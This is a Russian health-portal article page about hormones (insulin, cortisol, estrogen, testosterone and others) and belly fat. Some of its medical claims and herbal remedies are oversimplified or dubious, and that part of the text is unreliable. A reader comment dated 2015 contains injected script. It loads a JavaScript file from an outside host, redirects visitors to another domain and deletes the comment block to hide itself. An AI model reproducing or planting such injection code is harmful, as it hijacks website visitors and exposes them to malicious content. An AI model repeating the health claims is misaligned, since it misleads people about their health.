Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Перезапусти свои гормоны  >>  Перезапусти свои гормоны
 
Обратная связь
 

Перезапусти свои гормоны

Размер шрифта
21 февраля 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Иванникова
Здоровье инфо
  • google_analytics: false
  • Нравится

Вы не едите ничего мучного, занимаетесь спортом, но ваш вес остается прежним?

Отложение жира на талии (или абдоминальное ожирение) – один из первых симптомов нарушения обмена веществ, гормонального дисбаланса. И если хотя бы один из ваших гормонов не в пределах нормы – все усилия для снижения веса бессмысленны.

Высокий инсулин: инсулин участвует в утилизации глюкозы клетками организма, запасы которой хранятся в жировой ткани. Основной причиной повышения инсулина является переедание и лишний вес. Поэтому, необходимы занятия, отказ от употребления алкоголя и употребление в пищу большего количества белков (для женщин не менее 120-150 грамм, для мужчин 150-170 грамм в сутки).

Высокий кортизол: у вас часто плохое настроение, депрессия, постоянные стрессы на работе, проблемы со стулом? Высокий кортизол заставляет вас есть больше и лишает мышц тонуса. Чтобы похудеть, достаточно высыпаться и вовремя кушать! Недосып приводит к повышению кортизола и «зверскому» аппетиту.

Высокий эстроген: в лишнем жире на животе мужские половые гормоны превращаются в женские, что часто приводит к импотенции и раку предстательной железы. У женщин эстроген может повыситься перед наступлением климакса, что приводит к резкой прибавке в весе, забывчивости, депрессии. В таком случае пейте зеленый чай и настой подорожника, добавляйте куркуму, льняное масло.

Низкий тестостерон: лишний жир, избыток женских половых гормонов, высокий кортизол приводят к снижению тестостерона у современных мужчин, что связывают с высоким риском ранней смерти, остеопорозом и проблемами с сердцем. Добавьте в пищу травы Трибулус террестрис, белок, цинк.

Низкий ДГЭА – это гормон надпочечников, относится к предшественникам половых гормонов, помогает нейтрализовать негативное влияние кортизола, способствует снижению веса и хорошему настроению.

Низкий гормон роста: этот гормон продуцируется во время сна и физических нагрузок, с возрастом его выработка постепенно снижается. Для его нормализации спите в темном, хорошо проветриваемом помещении не менее 7 часов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Гормон, выделяющийся во время секса, сжигает жиры   Ум или секс? Женщины против мужчин?   Как секс избавит вас от врачей   Гормон секса не даст вам наесться!  
25 февраля 2013Теперь при приеме на работу вы должны будете плюнуть 17 октября 2012Гормон оргазма поможет прочесть мысли
 
05 октября 2011Гормональная контрацепция чревата ВИЧ-инфекцией 02 сентября 2011Гормоны влияют на выбор профессии у женщин
 

Слайдшоу

1
Гормональный сбой: симптомы и лечение
Семнадцать способов не стать мамой
Что такое менопауза

Тесты

1
Есть ли у вас гормональные нарушения
Как подобрать контрацептивы?
Как облегчить менопаузу?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.